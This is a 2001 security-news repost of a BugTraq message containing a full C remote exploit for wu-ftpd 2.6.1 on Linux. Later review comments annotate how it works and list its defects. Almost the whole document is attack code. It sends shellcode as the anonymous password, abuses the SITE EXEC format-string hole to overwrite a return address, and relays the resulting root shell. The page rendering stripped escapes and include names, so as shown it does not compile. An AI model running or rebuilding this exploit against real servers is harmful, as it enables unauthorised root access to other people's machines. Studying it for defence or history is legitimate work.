
wu-ftpd 2.6.1(1) on linux Exploit

posted on March 8, 2001
by hitbsecnews

Posted to BugTraq:

"hi,

this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me

bringin' you the 0day from the hackweiser crew, australian chapter

cya,
Till"

The full text follows in the read more link...
Note: no code review has been made of this listing; compile and execute it at your own risk. As rendered here the listing will not compile unmodified: the backslashes of the "\n" and "\x.." escape sequences and the header names in the #include lines have been stripped.

----

/*
* Linux wu-ftpd - 2.6.1(1)
*
* DiGiT
*/

#include
#include
#include
#include
#include

/*
 * Payload sent as the anonymous-login password (see main()).
 *
 * NOTE(review): the page renderer stripped the backslashes, so every "\xNN"
 * escape appears here as the three ASCII characters "xNN".  As shown this
 * is plain text, not machine code, and it is three times the intended
 * length, so sizeof(nop) - strlen(linuxcode) - 10 in main() wraps around
 * to a huge memset() length.  Restore the escapes before reading it as code.
 *
 * Reading the byte values alone (not verified with a disassembler): the
 * "b0 NN cd 80" pairs are int 0x80 calls with al = 0x46 (setreuid), 0x3f
 * (dup2), 0x27 (mkdir), 0x3d (chroot, twice), 0x0c (chdir, in a loop), 0x0b
 * (execve) and 0x01 (exit); the ASCII tail "0bin0sh1..11" is patched in
 * place at run time into "/bin/sh" and "..".  That is consistent with the
 * usual chroot-escape-then-shell layout, but confirm before relying on it.
 */
char linuxcode[] =
"x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdb"
"x43x89xd9x41xb0x3fxcdx80xebx6bx5ex31xc0x31"
"xc9x8dx5ex01x88x46x04x66xb9xffxffx01xb0x27"
"xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31"
"xdbx8dx5ex08x89x43x02x31xc9xfexc9x31xc0x8d"
"x5ex08xb0x0cxcdx80xfexc9x75xf3x31xc0x88x46"
"x09x8dx5ex08xb0x3dxcdx80xfex0exb0x30xfexc8"
"x88x46x04x31xc0x88x46x07x89x76x08x89x46x0c"
"x89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
"x31xdbxb0x01xcdx80xe8x90xffxffxffxffxffxff"
"x30x62x69x6ex30x73x68x31x2ex2ex31x31";

/*
 * Entry point.  argv[1] is the target host (dotted quad or resolvable
 * name); the FTP port is fixed at 21.  Every error path calls exit(-1) and
 * the function never returns normally: the relay loop at the end only
 * leaves through exit().
 *
 * NOTE(review): as rendered on this page the listing does not compile.
 * The renderer stripped the header names from the #include lines, the
 * backslashes from every "\n" (which is why string literals below appear
 * split across physical lines; a few of those splits may instead be
 * mail-client wrapping) and from the "\x.." escapes of linuxcode[], and
 * the ESC byte from the "\033[..m" colour sequences in the fprintf()
 * calls.  The code is annotated as written; nothing has been changed.
 *
 * The code assumes a 32-bit i386 host and target: addresses are held in
 * long and printed with %x, the four address bytes are emitted with %c,
 * and inet_addr()'s INADDR_NONE is compared with -1 through a long.
 *
 * Flow, as far as the visible code shows:
 *   1. connect to argv[1]:21, send "user ftp" and a "pass" whose argument
 *      is a 0x90 sled followed by linuxcode[];
 *   2. send "SITE EXEC %x %x %x %x +%x |%x" and treat the target as
 *      vulnerable unless "%x" comes back literally (format-string probe);
 *   3. pull two hex words out of the replies (reta, retb) and adjust them
 *      by hard-coded offsets (0x58, 0x2569, 100, 600);
 *   4. loop, growing the number of "%d" conversions, until a word leaked by
 *      a trailing "%x" equals reta, i.e. until the address embedded at the
 *      head of the request itself is reached on the stack;
 *   5. send one more "SITE EXEC" whose "%.<N>d%n" stores a count derived
 *      from retb through that pointer, then relay stdin/socket until the
 *      connection closes.
 *
 * Defects in the code as written (see the NOTE(review) lines inline):
 *   - socket() failure is tested with !pip; the failure value is -1.
 *   - cmdbuf is zeroed right after the login reply is read, so the "530"
 *     check never fires.
 *   - strtoul()'s endptr argument is given a char* instead of a char**, so
 *     the end pointer is stored into cmdbuf itself.
 *   - strstr() results are used without a NULL check.
 *   - select() is called with nfds = 255 rather than pip + 1.
 *   - read()/write() return values are ignored except in the relay loop,
 *     and each reply is assumed to arrive in a single read() after sleep().
 */
main (int argc, char *argv[])
{

char cmdbuf[8192];          /* outgoing request / incoming reply buffer */
char cbuf[1024];            /* banner, then the request tail, then relay buffer */
char *t;                    /* points at the '|' marker inside a reply */
char nop[400];              /* 0x90 sled + linuxcode[], sent as the password */
int pip, i, a = 22, st = 0; /* pip: socket; a: "%d" count; st: which leaked word matched */
struct sockaddr_in sck;
struct hostent *hp;
long inet;
int port = 21;
fd_set fds;
unsigned int aa;            /* NOTE(review): first assigned only after the search loop */
long reta, retb, tmp, retz; /* words parsed back from the server's replies */
int ret;
int add = 0;                /* becomes 600 when the '|' word of the first probe was non-zero */

memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));
memset (nop, 0x0, sizeof (nop));

/* The target is the only argument. */
if (argc < 2)
{
fprintf (stderr, "Usage: %s [ip]
", argv[0]);
exit (-1);
}

pip = socket (PF_INET, SOCK_STREAM, 0);

/* NOTE(review): socket() returns -1 on failure and 0 is a valid
 * descriptor, so this test is wrong; it should be (pip < 0). */
if (!pip)
{
perror ("socket()");
exit (-1);
}

/* Resolve argv[1]: dotted quad first, then host name.
 * NOTE(review): inet_addr() returns an unsigned 32-bit value; on an LP64
 * host INADDR_NONE stored in a long is 4294967295, not -1, so the name
 * lookup fallback never runs there and memcpy() only fills 4 of 8 bytes. */
inet = inet_addr (argv[1]);
if (inet == -1)
{
if (hp = gethostbyname (argv[1]))
memcpy (&inet, hp->h_addr, 4);
else
inet = -1;
if (inet == -1)
{
fprintf (stderr, "Cant resolv %s!!
", argv[1]);
exit (-1);
}
}
sck.sin_family = PF_INET;
sck.sin_port = htons (port);
sck.sin_addr.s_addr = inet;

if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)
{
perror ("Connect() ");
exit (-1);
}

/* Read the greeting (cbuf was zeroed, so up to 1023 bytes stay
 * terminated) and log in anonymously.  The password is the payload: a
 * 0x90 sled of sizeof(nop) - strlen(linuxcode) - 10 bytes followed by
 * linuxcode[], presumably so that the shellcode lands in whatever buffer
 * the server keeps the password in (the address printed later as
 * "Proctitle addres"). */
read (pip, cbuf, 1023);
fprintf (stderr, "Connected to: %s
", argv[1]);
fprintf (stderr, "Banner: %s
", cbuf);
strcpy (cmdbuf, "user ftp
");
write (pip, cmdbuf, strlen (cmdbuf));
memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);

strcat (nop, linuxcode);

memset (cmdbuf, 0x0, sizeof (cmdbuf));
sprintf (cmdbuf, "pass %s
", nop);
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
/* NOTE(review): cmdbuf is cleared before it is inspected, so the "530"
 * (login failed) check below can never match.  A failed login is only
 * noticed indirectly, when the SITE EXEC probe comes back unexpanded. */
memset (cmdbuf, 0x0, sizeof (cmdbuf));
if (!strncmp (cmdbuf, "530", 3))
{
printf ("loggin incorrect : %s
", cmdbuf);
exit (-1);
}
fprintf (stderr, "Logged in..
");
fprintf (stderr, "+ Finding ret addresses
");
/* Format-string probe.  A server that hands the SITE EXEC argument to a
 * printf-style function expands the "%x"s into stack words; one that
 * treats it as data echoes "%x" back literally at offset 4 of the reply.
 * The "+" and "|" markers tag the two words parsed out below. */
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
/* The "[1m[31m" / "[0m" fragments below are ANSI colour sequences whose
 * leading ESC byte was lost in rendering. */
if (!strncmp (cmdbuf + 4, "%x", 2))
{
fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s
[0m",
cmdbuf);
exit (-1);
}
else
{
fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s
[0m",
cmdbuf);
}
/* NOTE(review): strtoul()'s second parameter is char **endptr; a char*
 * is passed here, so the end pointer is written into cmdbuf at that
 * offset instead of into a variable.  strstr() also returns NULL when the
 * marker is missing from the reply, and NULL + 1 is then dereferenced. */
reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") +
11, 16);

/* Second probe: 89 "%x" conversions followed by a tagged "|%x".  The
 * tagged word becomes retb, the base of the "Proctitle" address below. */
memset (cmdbuf, 0x0, sizeof (cmdbuf));
strcpy (cmdbuf, "SITE EXEC ");
for (ret = 0; ret <= 88; ret++)
{
strcat (cmdbuf, "%x");
}
strcat (cmdbuf, "|%x
");
write (pip, cmdbuf, strlen (cmdbuf));
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
printf ("Ret location befor: %x
", reta);
/* Use the "|" word if it was non-zero (and remember that via add = 600),
 * otherwise fall back to the "+" word.  The constants are empirical
 * offsets for the targeted build; nothing in this file derives them. */
if (reta == 0)
reta = retz;
else
add = 600;
reta = reta - 0x58;
retb = retb + 100 - 0x2569 - add;
printf ("Ret location : %x
", reta);
printf ("Proctitle addres : %x and %u
", retb, retb);
sleep (2);
memset (cmdbuf, 0x0, sizeof (cmdbuf));

/* This sprintf() is overwritten by the identical one at the top of the
 * loop below; it has no effect of its own. */
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
a = 22;
memset (cbuf, 0x0, sizeof (cbuf));
/* Stack-offset search.  Each request starts with filler, the four bytes
 * of reta in little-endian order (the fixed byte between the 2nd and 3rd
 * was "\xff" before rendering; the reason is not stated here -- it is
 * consistent with telnet IAC doubling for the 0xff in a 0xbfffXXXX
 * address, verify against the server's command reader), then 129 "%.f"
 * (each consumes a double, two stack words) and (a + 1) "%d" conversions
 * to step along the stack, and finally "|%x|%x" to leak the next two
 * words.  a grows until one of the leaked words equals reta, i.e. until
 * the request's own bytes have been reached.
 * NOTE(review): a byte of reta equal to 0x00 truncates the request at that
 * %c (strcat/strlen stop at NUL); 0x0a would end the FTP command line. */
while (1)
{

memset (cmdbuf, 0x0, sizeof (cmdbuf));

sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");
/* NOTE(review): "%%x" is a literal "%x", so this format consumes no
 * argument; aa (still unassigned at this point) is passed but unused. */
sprintf (cbuf, "|%%x|%%x
", aa + 9807 - 460);
strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
/* NOTE(review): t is not checked for NULL.  The first strtoul() stores
 * its end pointer at t + 11, which is exactly where the second strtoul()
 * then starts parsing, so "tmp 2" is read from the pointer's bytes rather
 * than from the reply text. */
t = (char *) strstr (cmdbuf, "|");
tmp = strtoul (t + 1, t + 11, 16);
if (tmp != 0)
{
fprintf (stderr, "tmp 1 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 1;
break;
}
tmp = strtoul (t + 11, t + 22, 16);
fprintf (stderr, "tmp 2 : 0x%x
", tmp);
if (tmp == reta)
{
fprintf (stderr, "Cached a : %d
", a);
st = 2;
break;
}
}
if (st > 0)
break;
/* NOTE(review): no upper bound.  If reta is never seen the request grows
 * by two bytes per iteration until the server drops the connection, after
 * which strstr() returns NULL and the strtoul() above faults. */
a++;
}
sleep (1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));
memset (cbuf, 0x0, sizeof (cbuf));

/* The write.  Same layout as the search request (with slightly longer
 * filler), but the tail is "|%.<N>d%n": the precision pads one word to at
 * least N characters and "%n" then stores the running character count
 * through the next word, which the search loop lined up to be reta.  N is
 * retb + 9807 (minus 480 in the add == 0 case), i.e. the count written is
 * meant to land on the presumed address of the sled in the password
 * buffer. */
sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%cxff%c%c",
(reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
(reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
for (i = 0; i <= 128; i++)
strcat (cmdbuf, "%.f");
/* One fewer "%d" than the search used, since "%.<N>d" consumes a word
 * itself; the add == 600 path keeps a unchanged. */
if (add != 600)
a = a - 1;
fprintf (stderr, "Trying with : %d
", a);
for (i = 0; i <= a; i++)
strcat (cmdbuf, "%d");

aa = retb;
if (add == 600)
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807);
else
sprintf (cbuf, "|%%.%ud%%n
", aa + 9807 - 480);

strcat (cmdbuf, cbuf);
write (pip, cmdbuf, strlen (cmdbuf));
memset (cmdbuf, 0x0, sizeof (cmdbuf));
read (pip, cmdbuf, sizeof (cmdbuf) - 1);
memset (cmdbuf, 0x0, sizeof (cmdbuf));

fprintf (stderr, "[1m[33m Wait for a shell.....
[0m");

/* Relay loop: socket -> stdout and stdin -> socket until the socket
 * reports EOF or error.
 * NOTE(review): select()'s nfds should be pip + 1, not 255, and stdin data
 * is forwarded with strlen(), so input containing a NUL byte is cut short. */
while (1)
{
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (pip, &fds);
select (255, &fds, NULL, NULL, NULL);
if (FD_ISSET (pip, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
ret = read (pip, cbuf, sizeof (cbuf) - 1);
if (ret <= 0)
{
printf ("Connection closed - EOF
");
exit (-1);
}
printf ("%s", cbuf);
}
if (FD_ISSET (0, &fds))
{
memset (cbuf, 0x0, sizeof (cbuf));
read (0, cbuf, sizeof (cbuf) - 1);
write (pip, cbuf, strlen (cbuf));
}
}
/* Unreachable: the loop above only leaves via exit(). */
close (pip);
}
